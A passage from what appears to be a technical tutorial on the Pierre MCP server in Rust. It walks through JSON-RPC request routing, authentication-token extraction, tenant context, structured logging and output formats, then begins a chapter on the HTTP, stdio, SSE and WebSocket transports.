Source: src/mcp/mcp_request_processor.rs:78-94
#![allow(unused)]
fn main() {
/// Process an MCP request and generate response
async fn process_request(&self, request: McpRequest) -> Result<McpResponse> {
// Validate request format
Self::validate_request(&request)?;
// Route to appropriate handler based on method
match request.method.as_str() {
"initialize" => Ok(Self::handle_initialize(&request)),
"ping" => Ok(Self::handle_ping(&request)),
"tools/list" => Ok(Self::handle_tools_list(&request)),
"tools/call" => self.handle_tools_call(&request).await,
"authenticate" => Ok(Self::handle_authenticate(&request)),
method if method.starts_with("resources/") => Ok(Self::handle_resources(&request)),
method if method.starts_with("prompts/") => Ok(Self::handle_prompts(&request)),
_ => Ok(Self::handle_unknown_method(&request)),
}
}
}
Routing patterns:
- Exact match: "initialize", "ping", "tools/list"
- Async methods: tools/call returns a Future (awaited)
- Prefix match: method.starts_with("resources/") for resource operations
- Fallback: _ pattern returns "method not found" error
Rust Idiom: Guard clauses in match arms
The method if method.starts_with("resources/") pattern uses a guard clause to match all methods with a specific prefix. This is more flexible than enumerating every resource method.
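As a standalone illustration (the handler names returned here are placeholders), the routing table above reduces to a match with guard arms:

```rust
// Exact arms first, then guard arms matching any method with a given prefix,
// then the catch-all fallback.
fn route(method: &str) -> &'static str {
    match method {
        "initialize" => "handle_initialize",
        "ping" => "handle_ping",
        "tools/list" => "handle_tools_list",
        m if m.starts_with("resources/") => "handle_resources",
        m if m.starts_with("prompts/") => "handle_prompts",
        _ => "handle_unknown_method",
    }
}

fn main() {
    assert_eq!(route("resources/subscribe"), "handle_resources");
    assert_eq!(route("shutdown"), "handle_unknown_method");
    println!("routing table ok");
}
```

Note that arm order matters: an exact arm like "tools/list" must precede any guard that would also match it.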
MCP Protocol Handlers
Initialize Handler
The initialize method establishes the protocol connection:
Source: src/mcp/mcp_request_processor.rs:113-143
#![allow(unused)]
fn main() {
/// Handle MCP initialize request
fn handle_initialize(request: &McpRequest) -> McpResponse {
debug!("Handling initialize request");
let server_info = serde_json::json!({
"protocolVersion": crate::constants::protocol::mcp_protocol_version(),
"capabilities": {
"tools": {
"listChanged": true
},
"resources": {
"subscribe": true,
"listChanged": true
},
"prompts": {
"listChanged": true
}
},
"serverInfo": {
"name": "pierre-mcp-server",
"version": env!("CARGO_PKG_VERSION")
}
});
McpResponse {
jsonrpc: JSONRPC_VERSION.to_owned(),
id: request.id.clone(),
result: Some(server_info),
error: None,
}
}
}
Response structure:
{
"jsonrpc": "2.0",
"result": {
"protocolVersion": "2025-06-18",
"capabilities": {
"tools": {"listChanged": true},
"resources": {"subscribe": true, "listChanged": true},
"prompts": {"listChanged": true}
},
"serverInfo": {
"name": "pierre-mcp-server",
"version": "0.1.0"
}
},
"id": 1
}
Capabilities:
- tools.listChanged: Server notifies when tool list changes
- resources.subscribe: Clients can subscribe to resource updates
- resources.listChanged: Server notifies when resource list changes
- prompts.listChanged: Server notifies when prompt list changes
Rust Idiom: env!("CARGO_PKG_VERSION")
The env!() macro reads Cargo.toml version at compile time. This ensures the server version in responses always matches the actual build version.
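A minimal sketch of the idea. This sketch uses option_env! so it also compiles outside a Cargo build; inside Cargo, env!("CARGO_PKG_VERSION") fails the build if the variable is missing, which is usually the stricter behavior you want.

```rust
// Compile-time version lookup. Inside a Cargo build, CARGO_PKG_VERSION is
// always set; the fallback arm only applies under bare rustc.
const VERSION: &str = match option_env!("CARGO_PKG_VERSION") {
    Some(v) => v,
    None => "0.0.0-dev", // fallback for non-Cargo builds only
};

fn main() {
    println!("pierre-mcp-server {VERSION}");
}
```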
Ping Handler
The ping method tests connectivity:
Source: src/mcp/mcp_request_processor.rs:145-155
#![allow(unused)]
fn main() {
/// Handle MCP ping request
fn handle_ping(request: &McpRequest) -> McpResponse {
debug!("Handling ping request");
McpResponse {
jsonrpc: JSONRPC_VERSION.to_owned(),
id: request.id.clone(),
result: Some(serde_json::json!({})),
error: None,
}
}
}
Usage: Clients use ping to measure latency and verify the server is responsive.
tools/list Handler
The tools/list method returns available tools:
Source: src/mcp/mcp_request_processor.rs:174-193
#![allow(unused)]
fn main() {
/// Handle tools/list request
///
/// Per MCP specification, tools/list does NOT require authentication.
/// All tools are returned regardless of authentication status.
/// Individual tool calls will check authentication and trigger OAuth if needed.
fn handle_tools_list(request: &McpRequest) -> McpResponse {
debug!("Handling tools/list request");
// Get all available tools from schema
// MCP spec: tools/list must work without authentication
// Authentication is checked at tools/call time, not discovery time
let tools = crate::mcp::schema::get_tools();
McpResponse {
jsonrpc: JSONRPC_VERSION.to_owned(),
id: request.id.clone(),
result: Some(serde_json::json!({ "tools": tools })),
error: None,
}
}
}
Note: Per MCP spec, tools/list does not require authentication. This allows AI assistants to discover available tools before users authenticate. Authentication is enforced at tools/call time.
tools/call Handler
The tools/call method executes a specific tool:
Source: src/mcp/mcp_request_processor.rs:195-217
#![allow(unused)]
fn main() {
/// Handle tools/call request
async fn handle_tools_call(&self, request: &McpRequest) -> Result<McpResponse> {
debug!("Handling tools/call request");
request
.params
.as_ref()
.ok_or_else(|| AppError::invalid_input("Missing parameters for tools/call"))?;
// Execute tool using static method - delegate to ToolHandlers
let handler_request = McpRequest {
jsonrpc: request.jsonrpc.clone(),
method: request.method.clone(),
params: request.params.clone(),
id: request.id.clone(),
auth_token: request.auth_token.clone(),
headers: request.headers.clone(),
metadata: HashMap::new(),
};
let response =
ToolHandlers::handle_tools_call_with_resources(handler_request, &self.resources).await;
Ok(response)
}
}
Delegation: The tools/call handler delegates to ToolHandlers::handle_tools_call_with_resources which performs authentication and tool dispatch.
Authentication Extraction
The tool handler extracts authentication tokens from multiple sources:
Source: src/mcp/tool_handlers.rs:63-101
#![allow(unused)]
fn main() {
#[tracing::instrument(
skip(request, resources),
fields(
method = %request.method,
request_id = ?request.id,
tool_name = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
success = tracing::field::Empty,
duration_ms = tracing::field::Empty,
)
)]
pub async fn handle_tools_call_with_resources(
request: McpRequest,
resources: &Arc<ServerResources>,
) -> McpResponse {
// Extract auth token from either HTTP Authorization header or MCP params
let auth_token_string = request
.params
.as_ref()
.and_then(|params| params.get("token"))
.and_then(|token| token.as_str())
.map(|mcp_token| format!("Bearer {mcp_token}"));
let auth_token = request
.auth_token
.as_deref()
.or(auth_token_string.as_deref());
debug!(
"MCP tool call authentication attempt for method: {} (token source: {})",
request.method,
if request.auth_token.is_some() {
"HTTP header"
} else {
"MCP params"
}
);
}
Token sources (in priority order):
- HTTP header: request.auth_token (from Authorization: Bearer <token>)
- MCP params: request.params.token (passed in JSON-RPC params)
Design pattern: Checking multiple sources allows flexibility:
- WebSocket/HTTP clients use HTTP Authorization header
- stdio clients pass token in MCP params (no HTTP headers available)
Rust Idiom: or() for fallback
The expression request.auth_token.as_deref().or(auth_token_string.as_deref()) tries the first source, then falls back to the second if None. This is more concise than if let chains.
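A self-contained sketch of the fallback (the pick_token helper is hypothetical):

```rust
// Prefer the HTTP Authorization header token, fall back to the MCP-params token.
fn pick_token<'a>(http_header: Option<&'a str>, mcp_params: Option<&'a str>) -> Option<&'a str> {
    // `or` keeps the first Some; prefer `or_else` when building the fallback is costly.
    http_header.or(mcp_params)
}

fn main() {
    assert_eq!(pick_token(Some("Bearer h"), Some("Bearer p")), Some("Bearer h"));
    assert_eq!(pick_token(None, Some("Bearer p")), Some("Bearer p"));
    assert_eq!(pick_token(None, None), None);
}
```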
Authentication and Tenant Extraction
After extracting the token, the handler authenticates and extracts tenant context:
Source: src/mcp/tool_handlers.rs:103-160
#![allow(unused)]
fn main() {
match resources
.auth_middleware
.authenticate_request(auth_token)
.await
{
Ok(auth_result) => {
// Record authentication success in span
tracing::Span::current()
.record("user_id", auth_result.user_id.to_string())
.record("tenant_id", auth_result.user_id.to_string()); // Use user_id as tenant_id for now
info!(
"MCP tool call authentication successful for user: {} (method: {})",
auth_result.user_id,
auth_result.auth_method.display_name()
);
// Update user's last active timestamp
if let Err(e) = resources
.database
.update_last_active(auth_result.user_id)
.await
{
tracing::warn!(
user_id = %auth_result.user_id,
error = %e,
"Failed to update user last active timestamp (activity tracking impacted)"
);
}
// Extract tenant context from request and auth result
let tenant_context = crate::mcp::tenant_isolation::extract_tenant_context_internal(
&resources.database,
Some(auth_result.user_id),
None,
None, // MCP transport headers not applicable here
)
.await
.inspect_err(|e| {
tracing::warn!(
user_id = %auth_result.user_id,
error = %e,
"Failed to extract tenant context - tool will execute without tenant isolation"
);
})
.ok()
.flatten();
// Use the provided ServerResources directly
Self::handle_tool_execution_direct(request, auth_result, tenant_context, resources)
.await
}
Err(e) => {
tracing::Span::current().record("success", false);
Self::handle_authentication_error(request, &e)
}
}
}
Flow:
- Authenticate: Validate JWT token with auth_middleware.authenticate_request
- Record span: Add user_id and tenant_id to tracing span
- Update last active: Record user activity timestamp
- Extract tenant: Look up tenant context for multi-tenancy
- Execute tool: Dispatch to specific tool handler
- Handle errors: Return authentication error response
Rust Idiom: inspect_err for side effects
The inspect_err(|e| { tracing::warn!(...) }) method logs errors without affecting the Result chain. This is cleaner than:
#![allow(unused)]
fn main() {
match tenant_context {
Err(e) => {
tracing::warn!(...);
Err(e)
}
ok => ok
}
}
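The same chain can be exercised end to end with std types only (lookup and tenant_id below are illustrative stand-ins for the tenant-context call; Result::inspect_err is stable since Rust 1.76):

```rust
// Illustrative stand-in for the tenant-context lookup above.
fn lookup(ok: bool) -> Result<Option<u32>, String> {
    if ok { Ok(Some(42)) } else { Err("tenant lookup failed".to_owned()) }
}

fn tenant_id(ok: bool) -> Option<u32> {
    lookup(ok)
        .inspect_err(|e| eprintln!("warning: {e}")) // log without consuming the Result
        .ok() // Result<Option<u32>, _> -> Option<Option<u32>>
        .flatten() // Option<Option<u32>> -> Option<u32>
}

fn main() {
    assert_eq!(tenant_id(true), Some(42));
    assert_eq!(tenant_id(false), None); // warning printed, execution continues
}
```

The final ok().flatten() is what lets the handler degrade gracefully: a failed lookup becomes None rather than aborting the tool call.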
Tool Handler Dispatch
The tool execution handler routes to specific tool implementations:
Source: src/mcp/tool_handlers.rs:173-200
#![allow(unused)]
fn main() {
async fn handle_tool_execution_direct(
request: McpRequest,
auth_result: AuthResult,
tenant_context: Option<TenantContext>,
resources: &Arc<ServerResources>,
) -> McpResponse {
let Some(params) = request.params else {
error!("Missing request parameters in tools/call");
return McpResponse {
jsonrpc: "2.0".to_owned(),
id: request.id,
result: None,
error: Some(McpError {
code: ERROR_INVALID_PARAMS,
message: "Invalid params: Missing request parameters".to_owned(),
data: None,
}),
};
};
let tool_name = params["name"].as_str().unwrap_or("");
let args = ¶ms["arguments"];
let user_id = auth_result.user_id;
// Record tool name in span
tracing::Span::current().record("tool_name", tool_name);
let start_time = std::time::Instant::now();
}
Parameter extraction:
- params["name"]: Tool name (e.g., "get_activities")
- params["arguments"]: Tool arguments as JSON
- auth_result.user_id: Authenticated user
The handler then dispatches to tool-specific functions based on tool_name.
Notification Handling
Notifications are requests without responses:
Source: Inferred from src/mcp/mcp_request_processor.rs:44-49
#![allow(unused)]
fn main() {
// Handle notifications (no response needed)
if request.method.starts_with("notifications/") {
Self::handle_notification(&request);
Self::log_completion("notification", start_time);
return None;
}
}
MCP notification methods:
- notifications/progress: Progress updates for long-running operations
- notifications/cancelled: Cancellation signals
- notifications/message: Log messages
Return value: None indicates no response should be sent. The transport layer handles this by not writing to the connection.
Structured Logging
The platform uses tracing spans for structured logging:
Source: src/mcp/tool_handlers.rs:64-75
#![allow(unused)]
fn main() {
#[tracing::instrument(
skip(request, resources),
fields(
method = %request.method,
request_id = ?request.id,
tool_name = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
success = tracing::field::Empty,
duration_ms = tracing::field::Empty,
)
)]
}
Span fields:
- method: MCP method name (always present)
- request_id: Request correlation ID (always present)
- tool_name: Filled in after extracting from params
- user_id: Filled in after authentication
- tenant_id: Filled in after tenant extraction
- success: Filled in after tool execution
- duration_ms: Filled in before returning
Recording values:
#![allow(unused)]
fn main() {
tracing::Span::current().record("tool_name", tool_name);
tracing::Span::current().record("user_id", auth_result.user_id.to_string());
tracing::Span::current().record("success", true);
}
Error Handling Patterns
The platform converts Result<McpResponse> to McpResponse with errors:
Source: src/mcp/mcp_request_processor.rs:52-72
#![allow(unused)]
fn main() {
let response = match self.process_request(request.clone()).await {
Ok(response) => response,
Err(e) => {
error!(
"Failed to process MCP request: {} | Request: method={}, jsonrpc={}, id={:?}",
e, request.method, request.jsonrpc, request.id
);
error!("Request params: {:?}", request.params);
error!("Full error details: {:#}", e);
McpResponse {
jsonrpc: JSONRPC_VERSION.to_owned(),
id: request.id.clone(),
result: None,
error: Some(McpError {
code: ERROR_INTERNAL_ERROR,
message: format!("Internal server error: {e}"),
data: None,
}),
}
}
};
}
Error logging:
- Error message with context
- Request details (method, jsonrpc, id)
- Request params (may contain sensitive data, use debug level)
- Full error chain with {:#} formatter
Response structure: All errors return ERROR_INTERNAL_ERROR (-32603) code. More specific codes (METHOD_NOT_FOUND, INVALID_PARAMS) are returned by individual handlers.
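The mapping from error kinds to JSON-RPC codes can be sketched as follows. The numeric constants come from the JSON-RPC 2.0 specification; the HandlerError enum is illustrative, not Pierre's actual AppError type:

```rust
// JSON-RPC 2.0 reserved error codes.
const ERROR_METHOD_NOT_FOUND: i32 = -32601;
const ERROR_INVALID_PARAMS: i32 = -32602;
const ERROR_INTERNAL_ERROR: i32 = -32603;

// Illustrative error kinds a handler might surface.
enum HandlerError {
    MethodNotFound,
    InvalidParams,
    Internal,
}

fn error_code(e: &HandlerError) -> i32 {
    match e {
        HandlerError::MethodNotFound => ERROR_METHOD_NOT_FOUND,
        HandlerError::InvalidParams => ERROR_INVALID_PARAMS,
        HandlerError::Internal => ERROR_INTERNAL_ERROR,
    }
}

fn main() {
    // The top-level catch-all in handle_request maps everything to -32603.
    assert_eq!(error_code(&HandlerError::Internal), -32603);
    println!("fallback code: {}", error_code(&HandlerError::Internal));
}
```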
Output Formatters (TOON Support)
Pierre supports multiple output formats for tool responses, optimized for different consumers.
Source: src/formatters/mod.rs
#![allow(unused)]
fn main() {
/// Output serialization format selector
#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
pub enum OutputFormat {
/// JSON format (default) - universal compatibility
#[default]
Json,
/// TOON format - Token-Oriented Object Notation for LLM efficiency
/// Achieves ~40% token reduction compared to JSON
Toon,
}
impl OutputFormat {
/// Parse format from string parameter (case-insensitive)
#[must_use]
pub fn from_str_param(s: &str) -> Self {
match s.to_lowercase().as_str() {
"toon" => Self::Toon,
_ => Self::Json,
}
}
/// Get the MIME content type for this format
#[must_use]
pub const fn content_type(&self) -> &'static str {
match self {
Self::Json => "application/json",
Self::Toon => "application/vnd.toon",
}
}
}
}
Why TOON?
When LLMs process large datasets (e.g., a year of fitness activities), token count directly impacts:
- API costs (tokens × price per token)
- Context window usage (limited tokens available)
- Response latency (more tokens = slower processing)
TOON achieves ~40% token reduction by:
- Eliminating redundant JSON syntax (quotes, colons, commas)
- Using whitespace-based structure
- Preserving semantic meaning for LLM comprehension
Usage in tools:
#![allow(unused)]
fn main() {
use crate::formatters::{format_output, OutputFormat};
// Tool receives format preference from client
let format = params.output_format
.map(|s| OutputFormat::from_str_param(&s))
.unwrap_or_default();
// Serialize response in requested format
let output = format_output(&activities, format)?;
// output.data contains the serialized string
// output.content_type contains the MIME type
}
Format comparison:
// JSON (default): 847 tokens for 100 activities
{"activities":[{"id":"act_001","type":"Run","distance":5000,...},...]}
// TOON (~40% fewer tokens): 508 tokens for same data
activities
act_001
type Run
distance 5000
...
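A back-of-the-envelope illustration of the saving, using hand-rolled serializers for a flat record (not Pierre's actual TOON encoder, which also handles nesting and arrays): the same fields emitted as JSON and as an indentation-style encoding.

```rust
fn as_json(fields: &[(&str, &str)]) -> String {
    let body: Vec<String> = fields
        .iter()
        .map(|(k, v)| format!("\"{k}\":\"{v}\""))
        .collect();
    format!("{{{}}}", body.join(","))
}

fn as_toonish(fields: &[(&str, &str)]) -> String {
    // Drop quotes, colons, commas, and braces; structure comes from lines.
    fields
        .iter()
        .map(|(k, v)| format!("{k} {v}"))
        .collect::<Vec<_>>()
        .join("\n")
}

fn main() {
    let activity = [("id", "act_001"), ("type", "Run"), ("distance", "5000")];
    let json = as_json(&activity);
    let toon = as_toonish(&activity);
    // Byte length is a rough proxy for token count here.
    assert!(toon.len() < json.len());
    println!("json: {} bytes, toon-like: {} bytes", json.len(), toon.len());
}
```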
Key Takeaways
- Request lifecycle: MCP requests flow through transport → deserialization → validation → routing → authentication → tenant extraction → tool execution → serialization → transport.
- Validation first: All requests are validated for jsonrpc version and method field before routing.
- Method routing: Pattern matching on method string with exact match, async methods, prefix match, and fallback.
- Authentication sources: Tokens extracted from HTTP Authorization header (WebSocket/HTTP) or MCP params (stdio).
- Notification handling: Requests with method.starts_with("notifications/") return None (no response sent).
- Structured logging: #[tracing::instrument] with empty fields filled during processing provides comprehensive observability.
- Tenant extraction: After authentication, platform looks up user's tenant for multi-tenant isolation.
- Error conversion: Result<McpResponse> converted to McpResponse with error field for all failures.
- Tool dispatch: tools/call delegates to ToolHandlers which routes to specific tool implementations.
- Performance monitoring: Request duration measured from start to completion, recorded in logs.
Next Chapter: Chapter 11: MCP Transport Layers - Learn how the Pierre platform supports multiple transport mechanisms (HTTP, stdio, WebSocket, SSE) for MCP communication.
Chapter 11: MCP Transport Layers
Transport Abstraction Overview
MCP is transport-agnostic - the same JSON-RPC messages work over any transport:
┌──────────────────────────────────────────────────────────┐
│ MCP Protocol Layer │
│ (JSON-RPC requests/responses) │
└─────────────────┬────────────────────────────────────────┘
│
┌───────────┼───────────┬────────────┬────────────┐
│ │ │ │ │
▼ ▼ ▼ ▼ ▼
┌──────────┐ ┌────────┐ ┌────────┐ ┌────────┐ ┌────────┐
│ stdio │ │ HTTP │ │ SSE │ │ WS │ │Sampling│
│ (Direct) │ │ (API) │ │(Notify)│ │(Bidir) │ │ (LLM) │
└──────────┘ └────────┘ └────────┘ └────────┘ └────────┘
Source: src/mcp/transport_manager.rs:24-39
#![allow(unused)]
fn main() {
/// Manages multiple transport methods for MCP communication
pub struct TransportManager {
resources: Arc<ServerResources>,
notification_sender: broadcast::Sender<OAuthCompletedNotification>,
}
impl TransportManager {
/// Create a new transport manager with shared resources
#[must_use]
pub fn new(resources: Arc<ServerResources>) -> Self {
let (notification_sender, _) = broadcast::channel(100);
Self {
resources,
notification_sender,
}
}
}
Design: Single TransportManager coordinates all transports using broadcast::channel for notifications.
HTTP Transport
HTTP transport serves MCP over REST endpoints:
Source: src/mcp/transport_manager.rs:103-128
#![allow(unused)]
fn main() {
/// Run HTTP server with restart on failure
async fn run_http_server_loop(shared_resources: Arc<ServerResources>, port: u16) -> ! {
loop {
info!("Starting unified Axum HTTP server on port {}", port);
let server = super::multitenant::MultiTenantMcpServer::new(shared_resources.clone());
let result = server
.run_http_server_with_resources_axum(port, shared_resources.clone())
.await;
Self::handle_server_restart(result).await;
}
}
async fn handle_server_restart(result: AppResult<()>) {
match result {
Ok(()) => {
error!("HTTP server unexpectedly completed - restarting in 5 seconds...");
sleep(Duration::from_secs(5)).await;
}
Err(e) => {
error!("HTTP server failed: {} - restarting in 10 seconds...", e);
sleep(Duration::from_secs(10)).await;
}
}
}
}
Features:
- Axum web framework for routing
- REST endpoints for MCP methods
- CORS support for web clients
- TLS/HTTPS support (production)
- Rate limiting per endpoint
Typical endpoints:
POST /mcp/initialize - Initialize MCP session
POST /mcp/tools/list - List available tools
POST /mcp/tools/call - Execute tool
GET /mcp/ping - Health check
GET /oauth/authorize - OAuth flow start
POST /oauth/callback - OAuth callback
Stdio Transport (Direct MCP)
Pierre includes a native Rust stdio transport for direct MCP communication without HTTP overhead:
Source: src/mcp/transport_manager.rs:155-165
#![allow(unused)]
fn main() {
/// Handles stdio transport for MCP communication
pub struct StdioTransport {
resources: Arc<ServerResources>,
}
impl StdioTransport {
/// Creates a new stdio transport instance
#[must_use]
pub const fn new(resources: Arc<ServerResources>) -> Self {
Self { resources }
}
}
Message processing loop:
Source: src/mcp/transport_manager.rs:245-291
#![allow(unused)]
fn main() {
/// Run stdio transport for MCP communication
pub async fn run(
&self,
notification_receiver: broadcast::Receiver<OAuthCompletedNotification>,
) -> AppResult<()> {
info!("MCP stdio transport ready - listening on stdin/stdout with sampling support");
let stdin_handle = stdin();
let mut lines = BufReader::new(stdin_handle).lines();
let sampling_peer = self.resources.sampling_peer.clone();
// Clone resources for the notification task (moved into the closure below)
let resources_for_notifications = self.resources.clone();
// Spawn notification handler
let notification_handle = tokio::spawn(async move {
Self::handle_stdio_notifications(notification_receiver, resources_for_notifications).await
});
while let Some(line) = lines.next_line().await? {
if line.trim().is_empty() {
continue;
}
match serde_json::from_str::<serde_json::Value>(&line) {
Ok(message) => {
Self::process_stdio_message(
message,
self.resources.clone(),
sampling_peer.as_ref(),
).await;
}
Err(e) => {
warn!("Invalid JSON-RPC message: {}", e);
println!("{}", Self::parse_error_response());
}
}
}
// Cleanup on exit
if let Some(peer) = &sampling_peer {
peer.cancel_all_pending().await;
}
notification_handle.abort();
Ok(())
}
}
Stdio characteristics:
- Bidirectional: Full JSON-RPC over stdin/stdout
- Line-based: One JSON message per line
- BufReader: Efficient buffered reading
- MCP Sampling: Supports server-initiated LLM requests
- Concurrent startup: Runs alongside HTTP/SSE transports
MCP Sampling support:
The stdio transport includes special handling for MCP Sampling - a protocol feature allowing servers to request LLM completions from clients:
Source: src/mcp/transport_manager.rs:167-200
#![allow(unused)]
fn main() {
/// Check if a JSON message is a sampling response
fn is_sampling_response(message: &serde_json::Value) -> bool {
message.get("id").is_some()
&& message.get("method").is_none()
&& (message.get("result").is_some() || message.get("error").is_some())
}
/// Route a sampling response to the sampling peer
async fn route_sampling_response(
message: &serde_json::Value,
sampling_peer: Option<&Arc<super::sampling_peer::SamplingPeer>>,
) {
let Some(peer) = sampling_peer else {
warn!("Received sampling response but no sampling peer available");
return;
};
let id = message.get("id").cloned().unwrap_or(serde_json::Value::Null);
let result = message.get("result").cloned();
let error = message.get("error").cloned();
match peer.handle_response(id, result, error).await {
Ok(handled) if !handled => {
warn!("Received response for unknown sampling request");
}
Ok(_) => {}
Err(e) => warn!("Failed to handle sampling response: {}", e),
}
}
}
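The shape test above can be restated without a JSON library. In JSON-RPC 2.0, a request carries id and method, a response carries id plus result or error but no method, and a notification carries method without id. The boolean-flag helpers below are illustrative; the real implementation inspects the parsed JSON value as shown above:

```rust
// Classify a message by which JSON-RPC fields are present.
fn classify(has_id: bool, has_method: bool) -> &'static str {
    match (has_id, has_method) {
        (true, true) => "request",
        (true, false) => "response",
        (false, true) => "notification",
        (false, false) => "invalid",
    }
}

// Mirrors the rule in is_sampling_response: an id, no method, and a payload.
fn is_sampling_response(has_id: bool, has_method: bool, has_result_or_error: bool) -> bool {
    has_id && !has_method && has_result_or_error
}

fn main() {
    assert_eq!(classify(true, false), "response");
    assert_eq!(classify(false, true), "notification");
    assert!(is_sampling_response(true, false, true));
    assert!(!is_sampling_response(true, true, false)); // a request, not a response
}
```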
Transport startup:
Source: src/mcp/transport_manager.rs:70-85, 148
#![allow(unused)]
fn main() {
fn spawn_stdio_transport(
resources: Arc<ServerResources>,
notification_receiver: broadcast::Receiver<OAuthCompletedNotification>,
) {
let stdio_handle = tokio::spawn(async move {
let stdio_transport = StdioTransport::new(resources);
match stdio_transport.run(notification_receiver).await {
Ok(()) => info!("stdio transport completed successfully"),
Err(e) => warn!("stdio transport failed: {}", e),
}
});
// Monitor task completion
tokio::spawn(async move {
match stdio_handle.await {
Ok(()) => info!("stdio transport task completed"),
Err(e) => warn!("stdio transport task failed: {}", e),
}
});
}
// Called from start_legacy_unified_server()
Self::spawn_stdio_transport(shared_resources.clone(), notification_receiver);
}
Use cases:
- Claude Desktop integration via MCP stdio protocol
- Direct MCP client connections
- Server-initiated LLM requests (MCP Sampling)
- OAuth notifications to stdio clients
SSE Transport (Notifications)
Server-Sent Events provide server-to-client notifications:
Source: src/mcp/transport_manager.rs:90-101
#![allow(unused)]
fn main() {
/// Spawn SSE notification forwarder task
fn spawn_sse_forwarder(
resources: Arc<ServerResources>,
notification_receiver: broadcast::Receiver<OAuthCompletedNotification>,
) {
tokio::spawn(async move {
let sse_forwarder = SseNotificationForwarder::new(resources);
if let Err(e) = sse_forwarder.run(notification_receiver).await {
error!("SSE notification forwarder failed: {}", e);
}
});
}
}
SSE characteristics:
- Unidirectional: Server → Client only
- Long-lived: Connection stays open
- Text-based: Sends data:-prefixed messages
- Auto-reconnect: Browsers reconnect on disconnect
MCP notifications over SSE:
- OAuth flow completion
- Tool execution progress
- Resource updates
- Prompt changes
Example SSE event:
data: {"jsonrpc":"2.0","method":"notifications/oauth_completed","params":{"provider":"strava","status":"success"}}
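Framing such a payload follows the SSE wire format: one or more data: lines terminated by a blank line. A minimal sketch (sse_frame is a hypothetical helper, not Pierre's forwarder):

```rust
// Frame a payload per the Server-Sent Events wire format.
fn sse_frame(payload: &str) -> String {
    // Multi-line payloads need one `data:` prefix per line.
    let body: Vec<String> = payload
        .lines()
        .map(|l| format!("data: {l}"))
        .collect();
    // A blank line terminates the event.
    format!("{}\n\n", body.join("\n"))
}

fn main() {
    let frame = sse_frame(r#"{"jsonrpc":"2.0","method":"notifications/oauth_completed"}"#);
    assert!(frame.starts_with("data: {"));
    assert!(frame.ends_with("\n\n"));
    print!("{frame}");
}
```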
WebSocket Transport (Bidirectional)
WebSocket provides full-duplex bidirectional communication for real-time updates:
Source: src/websocket.rs:88-127
#![allow(unused)]
fn main() {
/// Manages WebSocket connections and message broadcasting
#[derive(Clone)]
pub struct WebSocketManager {
database: Arc<Database>,
auth_middleware: McpAuthMiddleware,
clients: Arc<RwLock<HashMap<Uuid, ClientConnection>>>,
broadcast_tx: broadcast::Sender<WebSocketMessage>,
}
impl WebSocketManager {
/// Creates a new WebSocket manager instance
#[must_use]
pub fn new(
database: Arc<Database>,
auth_manager: &Arc<AuthManager>,
jwks_manager: &Arc<JwksManager>,
rate_limit_config: RateLimitConfig,
) -> Self {
let (broadcast_tx, _) = broadcast::channel(WEBSOCKET_CHANNEL_CAPACITY);
let auth_middleware = McpAuthMiddleware::new(
(**auth_manager).clone(),
database.clone(),
jwks_manager.clone(),
rate_limit_config,
);
Self {
database,
auth_middleware,
clients: Arc::new(RwLock::new(HashMap::new())),
broadcast_tx,
}
}
}
WebSocket message types:
Source: src/websocket.rs:35-86
#![allow(unused)]
fn main() {
/// WebSocket message types for real-time communication
#[non_exhaustive]
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "type")]
pub enum WebSocketMessage {
/// Client authentication message
#[serde(rename = "auth")]
Authentication {
token: String,
},
/// Subscribe to specific topics
#[serde(rename = "subscribe")]
Subscribe {
topics: Vec<String>,
},
/// API key usage update notification
#[serde(rename = "usage_update")]
UsageUpdate {
api_key_id: String,
requests_today: u64,
requests_this_month: u64,
rate_limit_status: Value,
},
/// System-wide statistics update
#[serde(rename = "system_stats")]
SystemStats {
total_requests_today: u64,
total_requests_this_month: u64,
active_connections: usize,
},
/// Error message to client
#[serde(rename = "error")]
Error {
message: String,
},
/// Success confirmation message
#[serde(rename = "success")]
Success {
message: String,
},
}
}
Connection handling:
Source: src/websocket.rs:206-269
#![allow(unused)]
fn main() {
/// Handle incoming WebSocket connection
pub async fn handle_connection(&self, ws: WebSocket) {
let (mut ws_tx, mut ws_rx) = ws.split();
let (tx, mut rx) = tokio::sync::mpsc::unbounded_channel();
let connection_id = Uuid::new_v4();
let mut authenticated_user: Option<Uuid> = None;
let mut subscriptions: Vec<String> = Vec::new();
// Spawn task to forward messages to WebSocket
let ws_send_task = tokio::spawn(async move {
while let Some(message) = rx.recv().await {
if ws_tx.send(message).await.is_err() {
break;
}
}
});
// Handle incoming messages
while let Some(msg) = ws_rx.next().await {
match msg {
Ok(Message::Text(text)) => match serde_json::from_str::<WebSocketMessage>(&text) {
Ok(WebSocketMessage::Authentication { token }) => {
authenticated_user = self.handle_auth_message(&token, &tx).await;
}
Ok(WebSocketMessage::Subscribe { topics }) => {
subscriptions = Self::handle_subscribe_message(topics, authenticated_user, &tx);
}
// ... error handling
_ => {}
},
Ok(Message::Close(_)) | Err(_) => break,
_ => {}
}
}
// Store authenticated connection
if let Some(user_id) = authenticated_user {
let client = ClientConnection {
user_id,
subscriptions,
tx: tx.clone(),
};
self.clients.write().await.insert(connection_id, client);
}
// Clean up on disconnect
ws_send_task.abort();
self.clients.write().await.remove(&connection_id);
}
}
WebSocket authentication flow:
- Client connects to /ws endpoint
- Client sends {"type":"auth","token":"Bearer ..."} message
- Server validates JWT using McpAuthMiddleware
- Server responds with {"type":"success"} or {"type":"error"}
- Authenticated client can subscribe to topics
Topic subscription:
{
"type": "subscribe",
"topics": ["usage", "system"]
}
Broadcasting updates:
Source: src/websocket.rs:285-303
#![allow(unused)]
fn main() {
/// Broadcast usage update to subscribed clients
pub async fn broadcast_usage_update(
&self,
api_key_id: &str,
user_id: &Uuid,
requests_today: u64,
requests_this_month: u64,
rate_limit_status: Value,
) {
let message = WebSocketMessage::UsageUpdate {
api_key_id: api_key_id.to_owned(),
requests_today,
requests_this_month,
rate_limit_status,
};
self.send_to_user_subscribers(user_id, &message, "usage")
.await;
}
}
Periodic system stats:
Source: src/websocket.rs:394-409
#![allow(unused)]
fn main() {
/// Start background task for periodic updates
pub fn start_periodic_updates(&self) {
let manager = self.clone(); // Safe: Arc clone for background task
tokio::spawn(async move {
let mut interval = interval(Duration::from_secs(30)); // Update every 30 seconds
loop {
interval.tick().await;
// Broadcast system stats
if let Err(e) = manager.broadcast_system_stats().await {
warn!("Failed to broadcast system stats: {}", e);
}
}
});
}
}
WebSocket characteristics:
